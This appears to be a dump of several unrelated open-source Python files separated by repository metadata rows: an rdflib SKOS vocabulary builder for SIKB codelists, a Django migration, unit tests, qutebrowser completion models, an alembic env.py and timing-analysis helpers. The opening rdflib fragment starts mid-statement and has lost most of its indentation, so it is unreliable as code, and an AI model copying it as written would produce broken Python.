'waarnemingmethodeCodelijst': rdflib.URIRef(self.nss['crm'] + 'E55_Type')}
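        # Maps each SIKB0102 codelist to the CIDOC CRM / CRM-EH class that the
        # individual codes from that list are typed with further below.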
# new graph
self.graph = rdflib.Graph(identifier='SIKB0102_' + 'Vocabulary')
hf.setGraphNamespaceIDs(self.graph, namespace)
self.nss = dict(ns for ns in self.graph.namespace_manager.namespaces())
self.groot = rdflib.URIRef(self.basens + 'SIKB0102_' + 'Vocabulary')
# set type of protocol
hf.addType(self.graph, self.groot, rdflib.URIRef(self.nss['skos'] + 'ConceptScheme'))
# root attributes
child = rdflib.Literal('Codelijsten SIKB Archaeologisch Protocol 0102', 'nl')
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['dcterms'] + 'title'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
if 'versie' in self.troot.attrib.keys(): # versie
child = rdflib.Literal(self.troot.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in self.troot.attrib.keys(): # datum
child = rdflib.Literal(self.troot.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, self.groot, child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
# for each codelist
        for codelist in list(self.troot):
label = re.sub(r'\{.*\}([a-zA-Z]*)', r'\1', codelist.tag)
node = rdflib.URIRef(self.basens + 'SIKB_' + label.title())
hf.addType(self.graph, node, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addProperty(self.graph, node, self.groot, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
lnode = rdflib.Literal(label.title(), lang='nl')
hf.addProperty(self.graph, node , lnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, node , lnode, rdflib.URIRef(self.nss['rdfs'] + 'label'))
hf.addProperty(self.graph, node, self.groot, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, self.groot, node, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
if 'versie' in codelist.attrib.keys(): # versie
child = rdflib.Literal(codelist.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, node, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in codelist.attrib.keys(): # datum
child = rdflib.Literal(codelist.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, node , child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
if 'omschrijving' in codelist.attrib.keys(): # omschrijving
child = rdflib.Literal(hf.rawString(codelist.attrib['omschrijving']), 'nl')
hf.addProperty(self.graph, node , child, rdflib.URIRef(self.nss['skos'] + 'scopeNote'))
# for each entry in the codelist
for entry in list(codelist):
clabel = re.sub('/', '-', entry[0].text)
code = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + clabel)
lcnode = rdflib.Literal(codelist.attrib['naam'].title() + ' ' + clabel.upper(), lang='nl')
hf.addProperty(self.graph, code, lcnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, code, lcnode, rdflib.URIRef(self.nss['rdfs'] + 'label'))
hf.addProperty(self.graph, code, node, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
hf.addType(self.graph, code, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addType(self.graph, code, rdflib.URIRef(types[label]))
definition = rdflib.Literal(hf.rawString(entry[1].text), 'nl')
hf.addProperty(self.graph, code, definition, rdflib.URIRef(self.nss['skos'] + 'scopeNote'))
if 'versie' in entry.attrib.keys(): # versie
child = rdflib.Literal(entry.attrib['versie'], datatype=rdflib.URIRef(self.nss['xsd'] + 'string'))
hf.addProperty(self.graph, code, child, rdflib.URIRef(self.nss['prism'] + 'versionIdentifier'))
if 'datum' in entry.attrib.keys(): # datum
child = rdflib.Literal(entry.attrib['datum'], datatype=rdflib.URIRef(self.nss['xsd'] + 'date'))
hf.addProperty(self.graph, code , child, rdflib.URIRef(self.nss['dcterms'] + 'issued'))
if 'status' in entry.attrib.keys(): # status
child = rdflib.Literal(entry.attrib['status'], 'nl')
hf.addProperty(self.graph, code , child, rdflib.URIRef(self.nss['skos'] + 'note'))
                lablist = re.split(r'\.', clabel)
if len(lablist) >= 2:
broadcode = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + lablist[0])
hf.addProperty(self.graph, code, broadcode, rdflib.URIRef(self.nss['skos'] + 'broader'))
hf.addProperty(self.graph, broadcode, code, rdflib.URIRef(self.nss['skos'] + 'narrower'))
# TODO: only do for existing broader relation
else:
hf.addProperty(self.graph, code, node, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, node, code, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
if len(entry) > 2 and re.sub(r'\{.*\}([a-z][A-Z]*)', r'\1', entry[2].tag) == 'nieuweCode':
altlabel = re.sub('/', '-', entry[2].text)
altcode = rdflib.URIRef(self.basens + 'SIKB_Code_' \
+ codelist.attrib['naam'].title() \
+ '_' + altlabel)
altlabelnode = rdflib.Literal(codelist.attrib['naam'].title() + ' ' + altlabel.upper(), lang='nl')
hf.addProperty(self.graph, altcode, altlabelnode, rdflib.URIRef(self.nss['skos'] + 'prefLabel'))
hf.addProperty(self.graph, altcode, node, rdflib.URIRef(self.nss['skos'] + 'inScheme'))
hf.addType(self.graph, altcode, rdflib.URIRef(self.nss['skos'] + 'Concept'))
hf.addType(self.graph, altcode, rdflib.URIRef(types[label]))
hf.addProperty(self.graph, altcode, node, rdflib.URIRef(self.nss['skos'] + 'topConceptOf'))
hf.addProperty(self.graph, node, altcode, rdflib.URIRef(self.nss['skos'] + 'hasTopConcept'))
note = rdflib.Literal('Nieuwe code van {} {}'.format(re.sub(r'\{.*\}([a-z]*)[A-Za-z]*', r'\1',\
codelist.tag).title(), clabel), 'nl')
hf.addProperty(self.graph, altcode, note, rdflib.URIRef(self.nss['skos'] + 'note'))
note = rdflib.Literal('Heeft nieuwe code {}'.format(altlabel), 'nl')
hf.addProperty(self.graph, code, note, rdflib.URIRef(self.nss['skos'] + 'note'))
hf.addProperty(self.graph, altcode, code, rdflib.URIRef(self.nss['owl'] + 'sameAs'))
hf.addProperty(self.graph, code, altcode, rdflib.URIRef(self.nss['owl'] + 'sameAs'))
| gpl-2.0 | 2,940,578,772,786,231,300 | 66.865772 | 118 | 0.572488 | false |
Baymaxteam/SmartHomeDjango | SmartHome/users/migrations/0002_auto_20160129_1459.py | 1 | 1042 | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-29 06:59
from __future__ import unicode_literals
import django.contrib.auth.models
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterModelManagers(
name='user',
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.')], verbose_name='username'),
),
]
| bsd-3-clause | -2,031,301,591,925,869,300 | 36.214286 | 409 | 0.619962 | false |
rackerlabs/deuce-client | deuceclient/tests/test_common_validation_instance.py | 1 | 2263 | """
Tests - Deuce Client - Common - Validation - Instances
"""
import mock
from unittest import TestCase
from stoplight import validate
import deuceclient.api as api
import deuceclient.common.validation_instance as val_instance
import deuceclient.common.errors as errors
from deuceclient.tests import *
from deuceclient.utils import UniformSplitter
class ValidationInstanceTests(TestCase):
def setUp(self):
super(ValidationInstanceTests, self).setUp()
self.project_id = create_project_name()
self.vault_id = create_vault_name()
self.block = create_block()
self.storage_id = create_storage_block()
def tearDown(self):
super(ValidationInstanceTests, self).tearDown()
    def test_project_instance(self):
project = api.Project(self.project_id)
@validate(value=val_instance.ProjectInstanceRule)
def check_project(value):
return True
self.assertTrue(check_project(project))
with self.assertRaises(errors.InvalidProjectInstance):
check_project(project.project_id)
def test_vault_instance(self):
vault = api.Vault(self.project_id, self.vault_id)
@validate(value=val_instance.VaultInstanceRule)
def check_vault(value):
return True
self.assertTrue(check_vault(vault))
with self.assertRaises(errors.InvalidVaultInstance):
check_vault(vault.vault_id)
def test_block_instance(self):
block = api.Block(self.project_id, self.vault_id, self.block[0])
@validate(value=val_instance.BlockInstanceRule)
def check_block(value):
return True
self.assertTrue(check_block(block))
with self.assertRaises(errors.InvalidBlockInstance):
check_block(block.block_id)
def test_file_splitter_instance(self):
reader = make_reader(100, null_data=True)
splitter = UniformSplitter(self.project_id, self.vault_id, reader)
@validate(value=val_instance.FileSplitterInstanceRule)
def check_splitter(value):
return True
self.assertTrue(check_splitter(splitter))
with self.assertRaises(errors.InvalidFileSplitterType):
check_splitter(self.project_id)
| apache-2.0 | -2,824,867,123,911,083,500 | 28.776316 | 74 | 0.680071 | false |
forkbong/qutebrowser | qutebrowser/completion/models/miscmodels.py | 1 | 10499 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2021 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Functions that return miscellaneous completion models."""
import datetime
from typing import List, Sequence, Tuple
from qutebrowser.config import config, configdata
from qutebrowser.utils import objreg, log, utils
from qutebrowser.completion.models import completionmodel, listcategory, util
from qutebrowser.browser import inspector
def command(*, info):
"""A CompletionModel filled with non-hidden commands and descriptions."""
model = completionmodel.CompletionModel(column_widths=(20, 60, 20))
cmdlist = util.get_cmd_completions(info, include_aliases=True,
include_hidden=False)
model.add_category(listcategory.ListCategory("Commands", cmdlist))
return model
def helptopic(*, info):
"""A CompletionModel filled with help topics."""
model = completionmodel.CompletionModel(column_widths=(20, 70, 10))
cmdlist = util.get_cmd_completions(info, include_aliases=False,
include_hidden=True, prefix=':')
settings = ((opt.name, opt.description, info.config.get_str(opt.name))
for opt in configdata.DATA.values())
model.add_category(listcategory.ListCategory("Commands", cmdlist))
model.add_category(listcategory.ListCategory("Settings", settings))
return model
def quickmark(*, info=None):
"""A CompletionModel filled with all quickmarks."""
def delete(data: Sequence[str]) -> None:
"""Delete a quickmark from the completion menu."""
name = data[0]
quickmark_manager = objreg.get('quickmark-manager')
log.completion.debug('Deleting quickmark {}'.format(name))
quickmark_manager.delete(name)
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(30, 70, 0))
marks = objreg.get('quickmark-manager').marks.items()
model.add_category(listcategory.ListCategory('Quickmarks', marks,
delete_func=delete,
sort=False))
return model
def bookmark(*, info=None):
"""A CompletionModel filled with all bookmarks."""
def delete(data: Sequence[str]) -> None:
"""Delete a bookmark from the completion menu."""
urlstr = data[0]
log.completion.debug('Deleting bookmark {}'.format(urlstr))
bookmark_manager = objreg.get('bookmark-manager')
bookmark_manager.delete(urlstr)
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(30, 70, 0))
marks = objreg.get('bookmark-manager').marks.items()
model.add_category(listcategory.ListCategory('Bookmarks', marks,
delete_func=delete,
sort=False))
return model
def session(*, info=None):
"""A CompletionModel filled with session names."""
from qutebrowser.misc import sessions
utils.unused(info)
model = completionmodel.CompletionModel()
try:
sess = ((name,) for name
in sessions.session_manager.list_sessions()
if not name.startswith('_'))
model.add_category(listcategory.ListCategory("Sessions", sess))
except OSError:
log.completion.exception("Failed to list sessions!")
return model
def _tabs(*, win_id_filter=lambda _win_id: True, add_win_id=True):
"""Helper to get the completion model for tabs/other_tabs.
Args:
win_id_filter: A filter function for window IDs to include.
Should return True for all included windows.
add_win_id: Whether to add the window ID to the completion items.
"""
def delete_tab(data):
"""Close the selected tab."""
win_id, tab_index = data[0].split('/')
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=int(win_id))
tabbed_browser.on_tab_close_requested(int(tab_index) - 1)
model = completionmodel.CompletionModel(column_widths=(6, 40, 46, 8))
tabs_are_windows = config.val.tabs.tabs_are_windows
# list storing all single-tabbed windows when tabs_are_windows
windows: List[Tuple[str, str, str, str]] = []
for win_id in objreg.window_registry:
if not win_id_filter(win_id):
continue
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=win_id)
if tabbed_browser.is_shutting_down:
continue
tab_entries: List[Tuple[str, str, str, str]] = []
for idx in range(tabbed_browser.widget.count()):
tab = tabbed_browser.widget.widget(idx)
tab_str = ("{}/{}".format(win_id, idx + 1) if add_win_id
else str(idx + 1))
pid = tab.renderer_process_pid()
tab_entries.append((
tab_str,
tab.url().toDisplayString(),
tabbed_browser.widget.page_title(idx),
"" if pid is None else f"PID {pid}",
))
if tabs_are_windows:
windows += tab_entries
else:
title = str(win_id) if add_win_id else "Tabs"
cat = listcategory.ListCategory(
title, tab_entries, delete_func=delete_tab, sort=False)
model.add_category(cat)
if tabs_are_windows:
win = listcategory.ListCategory(
"Windows", windows, delete_func=delete_tab, sort=False)
model.add_category(win)
return model
def tabs(*, info=None):
"""A model to complete on open tabs across all windows.
Used for the tab-select command (and others).
"""
utils.unused(info)
return _tabs()
def other_tabs(*, info):
"""A model to complete on open tabs across all windows except the current.
Used for the tab-take command.
"""
return _tabs(win_id_filter=lambda win_id: win_id != info.win_id)
def tab_focus(*, info):
"""A model to complete on open tabs in the current window."""
model = _tabs(win_id_filter=lambda win_id: win_id == info.win_id,
add_win_id=False)
special = [
("last", "Focus the last-focused tab"),
("stack-next", "Go forward through a stack of focused tabs"),
("stack-prev", "Go backward through a stack of focused tabs"),
]
model.add_category(listcategory.ListCategory("Special", special))
return model
def window(*, info):
"""A model to complete on all open windows."""
model = completionmodel.CompletionModel(column_widths=(6, 30, 64))
windows = []
for win_id in objreg.window_registry:
if win_id == info.win_id:
continue
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=win_id)
tab_titles = (tab.title() for tab in tabbed_browser.widgets())
windows.append(("{}".format(win_id),
objreg.window_registry[win_id].windowTitle(),
", ".join(tab_titles)))
model.add_category(listcategory.ListCategory("Windows", windows))
return model
def inspector_position(*, info):
"""A model for possible inspector positions."""
utils.unused(info)
model = completionmodel.CompletionModel(column_widths=(100, 0, 0))
positions = [(e.name,) for e in inspector.Position]
category = listcategory.ListCategory("Position (optional)", positions)
model.add_category(category)
return model
def _qdatetime_to_completion_format(qdate):
if not qdate.isValid():
ts = 0
else:
ts = qdate.toMSecsSinceEpoch()
if ts < 0:
ts = 0
pydate = datetime.datetime.fromtimestamp(ts / 1000)
return pydate.strftime(config.val.completion.timestamp_format)
def _back_forward(info, go_forward):
history = info.cur_tab.history
current_idx = history.current_idx()
model = completionmodel.CompletionModel(column_widths=(5, 36, 50, 9))
if go_forward:
start = current_idx + 1
items = history.forward_items()
else:
start = 0
items = history.back_items()
entries = [
(
str(idx),
entry.url().toDisplayString(),
entry.title(),
_qdatetime_to_completion_format(entry.lastVisited())
)
for idx, entry in enumerate(items, start)
]
if not go_forward:
# make sure the most recent is at the top for :back
entries.reverse()
cat = listcategory.ListCategory("History", entries, sort=False)
model.add_category(cat)
return model
def forward(*, info):
"""A model to complete on history of the current tab.
Used for the :forward command.
"""
return _back_forward(info, go_forward=True)
def back(*, info):
"""A model to complete on history of the current tab.
Used for the :back command.
"""
return _back_forward(info, go_forward=False)
def undo(*, info):
"""A model to complete undo entries."""
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=info.win_id)
model = completionmodel.CompletionModel(column_widths=(6, 84, 10))
timestamp_format = config.val.completion.timestamp_format
entries = [
(
str(idx),
', '.join(entry.url.toDisplayString() for entry in group),
group[-1].created_at.strftime(timestamp_format)
)
for idx, group in
enumerate(reversed(tabbed_browser.undo_stack), start=1)
]
cat = listcategory.ListCategory("Closed tabs", entries, sort=False)
model.add_category(cat)
return model
| gpl-3.0 | 8,726,302,838,719,023,000 | 33.536184 | 78 | 0.622059 | false |
brynpickering/calliope | calliope/test/test_core_attrdict.py | 1 | 10804 | from io import StringIO
import os
import pytest
import numpy as np
import tempfile
import ruamel.yaml as ruamel_yaml
from calliope.core.attrdict import AttrDict, _MISSING
from calliope.test.common.util import check_error_or_warning
class TestAttrDict:
@pytest.fixture
def regular_dict(self):
d = {'a': 1,
'b': 2,
'c': {'x': 'foo',
'y': 'bar',
'z': {'I': 1,
'II': 2}
},
'd': None
}
return d
setup_string = """
# a comment
a: 1
b: 2
# a comment about `c`
c: # a comment inline with `c`
x: foo # a comment on foo
#
y: bar #
z:
I: 1
II: 2
d:
"""
@pytest.fixture
def yaml_file(self):
return StringIO(self.setup_string)
@pytest.fixture
def yaml_string(self):
return self.setup_string
@pytest.fixture
def attr_dict(self, regular_dict):
d = regular_dict
return AttrDict(d)
def test_missing_nonzero(self):
assert _MISSING is not True
assert _MISSING is not False
assert _MISSING is not None
assert _MISSING.__nonzero__() is False
def test_init_from_nondict(self):
with pytest.raises(ValueError) as excinfo:
d = AttrDict('foo')
assert check_error_or_warning(
excinfo, 'Must pass a dict to AttrDict'
)
def test_init_from_dict(self, regular_dict):
d = AttrDict(regular_dict)
assert d.a == 1
def test_init_from_dict_with_nested_keys(self):
d = AttrDict({'foo.bar.baz': 1})
assert d.foo.bar.baz == 1
def test_from_yaml_fobj(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_path(self):
this_path = os.path.dirname(__file__)
yaml_path = os.path.join(this_path, 'common', 'yaml_file.yaml')
d = AttrDict.from_yaml(yaml_path)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_string(self, yaml_string):
d = AttrDict.from_yaml_string(yaml_string)
assert d.a == 1
assert d.c.z.II == 2
def test_from_yaml_string_dot_strings(self):
yaml_string = 'a.b.c: 1\na.b.foo: 2'
d = AttrDict.from_yaml_string(yaml_string)
assert d.a.b.c == 1
assert d.a.b.foo == 2
def test_from_yaml_string_dot_strings_duplicate(self):
yaml_string = 'a.b.c: 1\na.b.c: 2'
with pytest.warns(ruamel_yaml.constructor.DuplicateKeyFutureWarning):
AttrDict.from_yaml_string(yaml_string)
def test_simple_invalid_yaml(self):
yaml_string = '1 this is not valid yaml'
with pytest.raises(ValueError) as excinfo:
AttrDict.from_yaml_string(yaml_string)
assert check_error_or_warning(
excinfo, 'Could not parse <yaml string> as YAML'
)
def test_parser_error(self):
with pytest.raises(ruamel_yaml.YAMLError):
AttrDict.from_yaml_string("""
foo: bar
baz: 1
- foobar
bar: baz
""")
def test_dot_access_first(self, attr_dict):
d = attr_dict
assert d.a == 1
def test_dot_access_second(self, attr_dict):
d = attr_dict
assert d.c.x == 'foo'
def test_dot_access_list(self):
d = AttrDict.from_yaml_string("a: [{x: 1}, {y: 2}]")
assert d.a[0].x == 1
def test_set_key_first(self, attr_dict):
d = attr_dict
d.set_key('a', 2)
assert d.a == 2
def test_set_key_second(self, attr_dict):
d = attr_dict
d.set_key('c.x', 'baz')
assert d.c.x == 'baz'
def test_set_key_multiple_inexisting(self, attr_dict):
d = attr_dict
d.set_key('c.l.o.h.a', 'foo')
assert d.c.l.o.h.a == 'foo'
def test_set_key_nested_on_string(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.set_key('a.foo', 'bar')
def test_set_key_nested_on_none(self, attr_dict):
d = attr_dict
assert d['d'] is None
d.set_key('d.foo', 'bar')
assert d.d.foo == 'bar'
def test_pass_regular_dict_to_set_key(self, attr_dict):
# Regular dicts get turned into AttrDicts when using
# assignment through set_key()
attr_dict.set_key('c.z.newkey', {'foo': 1, 'doo': 2})
assert isinstance(attr_dict.get_key('c.z.newkey'), AttrDict)
assert attr_dict.get_key('c.z.newkey.foo') == 1
def test_get_subkey_from_nested_non_attrdict(self, attr_dict):
# Directly assigning a dict means it is not modified
# but it breaks get_key with nested keys
attr_dict['c']['z']['newkey'] = {'foo': 1, 'doo': 2}
with pytest.raises(AttributeError) as excinfo:
attr_dict.get_key('c.z.newkey.foo')
assert check_error_or_warning(
excinfo, "'dict' object has no attribute 'get_key'"
)
def test_get_key_first(self, attr_dict):
d = attr_dict
assert d.get_key('a') == 1
def test_get_key_second(self, attr_dict):
d = attr_dict
assert d.get_key('c.x') == 'foo'
def test_get_key_inexistant(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.get_key('foo')
def test_get_key_second_inexistant(self, attr_dict):
d = attr_dict
with pytest.raises(KeyError):
d.get_key('foo.bar')
def test_get_key_default(self, attr_dict):
d = attr_dict
assert d.get_key('c.x', default='bar') == 'foo'
def test_get_key_inexistant_default(self, attr_dict):
d = attr_dict
assert d.get_key('foo', default='baz') == 'baz'
def test_get_key_second_inexistant_default(self, attr_dict):
d = attr_dict
assert d.get_key('foo.bar', default='baz') == 'baz'
def test_get_key_second_nondict_default(self, attr_dict):
d = attr_dict
assert d.get_key('c.x.foo', default='baz') == 'baz'
def test_get_key_inexistant_default_false(self, attr_dict):
d = attr_dict
assert d.get_key('foo', default=False) is False
def test_get_key_second_inexistant_default_false(self, attr_dict):
d = attr_dict
assert d.get_key('foo.bar', default=False) is False
def test_as_dict(self, attr_dict):
d = attr_dict
dd = d.as_dict()
assert dd['a'] == 1
assert dd['c']['x'] == 'foo'
def test_as_dict_with_sublists(self):
d = AttrDict.from_yaml_string("a: [{x: 1}, {y: 2}]")
dd = d.as_dict()
assert dd['a'][0]['x'] == 1
assert isinstance(dd['a'][0], dict) # Not AttrDict!
def test_as_dict_flat(self, attr_dict):
dd = attr_dict.as_dict(flat=True)
assert dd['c.x'] == 'foo'
def test_keys_nested_as_list(self, attr_dict):
d = attr_dict
dd = d.keys_nested()
assert dd == ['a', 'b', 'c.x', 'c.y', 'c.z.I', 'c.z.II', 'd']
def test_keys_nested_as_dict(self, attr_dict):
d = attr_dict
dd = d.keys_nested(subkeys_as='dict')
assert dd == ['a', 'b', {'c': ['x', 'y', {'z': ['I', 'II']}]}, 'd']
def test_union(self, attr_dict):
d = attr_dict
d_new = AttrDict()
d_new.set_key('c.z.III', 'foo')
d.union(d_new)
assert d.c.z.III == 'foo'
assert d.c.z.I == 1
def test_union_duplicate_keys(self, attr_dict):
d = attr_dict
d_new = AttrDict()
d_new.set_key('c.z.II', 'foo')
with pytest.raises(KeyError):
d.union(d_new)
def test_union_replacement(self, attr_dict):
d = attr_dict
d_new = AttrDict.from_yaml_string("""
c: {_REPLACE_: foo}
""")
d.union(d_new, allow_override=True, allow_replacement=True)
assert d.c == 'foo'
def test_union_empty_dicts(self, attr_dict):
d = attr_dict
d_new = AttrDict({
'1': {'foo': {}},
'baz': {'bar': {}},
})
d.union(d_new)
assert len(d.baz.bar.keys()) == 0
def test_del_key_single(self, attr_dict):
attr_dict.del_key('c')
assert 'c' not in attr_dict
def test_del_key_nested(self, attr_dict):
attr_dict.del_key('c.z.I')
assert 'I' not in attr_dict.c.z
def test_to_yaml(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
d.set_key('numpy.some_int', np.int32(10))
d.set_key('numpy.some_float', np.float64(0.5))
d.a_list = [0, 1, 2]
with tempfile.TemporaryDirectory() as tempdir:
out_file = os.path.join(tempdir, 'test.yaml')
d.to_yaml(out_file)
with open(out_file, 'r') as f:
result = f.read()
assert 'some_int: 10' in result
assert 'some_float: 0.5' in result
assert 'a_list:\n- 0\n- 1\n- 2' in result
def test_to_yaml_string(self, yaml_file):
d = AttrDict.from_yaml(yaml_file)
result = d.to_yaml()
assert 'a: 1' in result
def test_import_must_be_list(self):
yaml_string = """
import: 'somefile.yaml'
"""
with pytest.raises(ValueError) as excinfo:
AttrDict.from_yaml_string(yaml_string, resolve_imports=True)
assert check_error_or_warning(
excinfo, '`import` must be a list.')
def test_do_not_resolve_imports(self):
yaml_string = """
import: ['somefile.yaml']
"""
d = AttrDict.from_yaml_string(yaml_string, resolve_imports=False)
# Should not raise an error about a missing file, as we ask for
# imports not to be resolved
assert d['import'] == ['somefile.yaml']
def test_nested_import(self, yaml_file):
with tempfile.TemporaryDirectory() as tempdir:
imported_file = os.path.join(tempdir, 'test_import.yaml')
imported_yaml = """
somekey: 1
anotherkey: 2
"""
with open(imported_file, 'w') as f:
f.write(imported_yaml)
yaml_string = """
foobar:
import:
- {}
foo:
bar: 1
baz: 2
3:
4: 5
""".format(imported_file)
d = AttrDict.from_yaml_string(
yaml_string, resolve_imports='foobar'
)
assert 'foobar.somekey' in d.keys_nested()
assert d.get_key('foobar.anotherkey') == 2
| apache-2.0 | 3,015,041,769,618,771,500 | 29.606232 | 77 | 0.530452 | false |
stanzikratel/barbican-2 | barbican/model/migration/alembic_migrations/env.py | 1 | 2942 | # Copyright (c) 2013-2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
from alembic import context
from sqlalchemy import create_engine, pool
from barbican.model import models
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
# Note that the 'config' instance is not available in for unit testing.
try:
config = context.config
except Exception:
config = None
# WARNING! The following was autogenerated by Alembic as part of setting up
# the initial environment. Unfortunately it also **clobbers** the logging
# for the rest of this applicaton, so please do not use it!
# Interpret the config file for Python logging.
# This line sets up loggers basically.
#fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = models.BASE.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def get_sqlalchemy_url():
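    # Prefer a URL attached directly to the config object by the caller
    # (config.barbican_sqlalchemy_url); otherwise fall back to the
    # sqlalchemy.url option from the alembic .ini file.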
return config.barbican_sqlalchemy_url or config \
.get_main_option("sqlalchemy.url")
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
context.configure(url=get_sqlalchemy_url())
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = create_engine(
get_sqlalchemy_url(),
poolclass=pool.NullPool)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if config:
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| apache-2.0 | 4,279,292,624,011,151,400 | 28.42 | 75 | 0.711421 | false |
sjjhsjjh/blender-driver | diagnostic/analysis.py | 1 | 3137 | #!/usr/bin/python
# (c) 2018 Jim Hawkins. MIT licensed, see https://opensource.org/licenses/MIT
# Part of Blender Driver, see https://github.com/sjjhsjjh/blender-driver
"""Python module for the Blender Driver diagnostic.
This module contains analytical utilities that are used in some diagnostic and
demonstration Blender Driver applications."""
# Standard library imports, in alphabetic order.
#
# Module for column widths.
# https://docs.python.org/3/library/math.html
from math import log10
def timing_analysis_dump(times):
return "\n".join(timing_analysis(times))
def timing_analysis(times, timePrecision=4):
analyses = []
indexWidth = index_width(times)
timeWidth = field_width(times, precision=timePrecision)
lastTime = None
for index, time in enumerate(times):
indexStr = '{:{indexWidth}d} '.format(index, indexWidth=indexWidth)
timeStr = 'None'
analysis = ""
if time is not None:
timeStr = '{:{timeWidth}.{timePrecision}f}'.format(
time, timeWidth=timeWidth, timePrecision=timePrecision)
if lastTime is not None:
elapsed = time - lastTime
analysis = ' {:.{timePrecision}f} 1/{:.0f}'.format(
elapsed, 0.0 if elapsed <= 0 else 1.0 / elapsed
, timePrecision=timePrecision)
lastTime = time
analyses.append(''.join((indexStr, timeStr, analysis)))
return analyses
def index_width(lenable):
    return len("{:d}".format(len(lenable) - 1))
def field_width(values, precision=4, type="f"):
width = None
for value in values:
if value is None:
continue
str = '{:.{precision}{type}}'.format(
value, precision=precision, type=type)
if width is None or len(str) > width:
width = len(str)
return width
def timing_summary(times, totalLabel="total", otherLabel="run"
, noneLabel="skipped"
):
nones = times.count(None)
others = len(times) - nones
return '{}:{:d} {}:{:d}({:.0%}) {}:{:d}({:.0%})'.format(
totalLabel, len(times)
, otherLabel, others, float(others) / float(len(times))
, noneLabel, nones, float(nones) / float(len(times)))
def fall_analysis(positionsTimes):
analyses = []
lastPosition = None
falls = 0
indexWidth = index_width(positionsTimes)
for index, positionTime in enumerate(positionsTimes):
position, time = positionTime
if lastPosition == position:
fall = " ="
else:
fall = ""
falls += 1
lastPosition = position
analyses.append('{:{indexWidth}d} {:.2f} {:.4f}{}'.format(
index, position, time, fall, indexWidth=indexWidth))
return len(analyses) - falls, "\n".join(analyses)
if __name__ == '__main__':
print(__doc__)
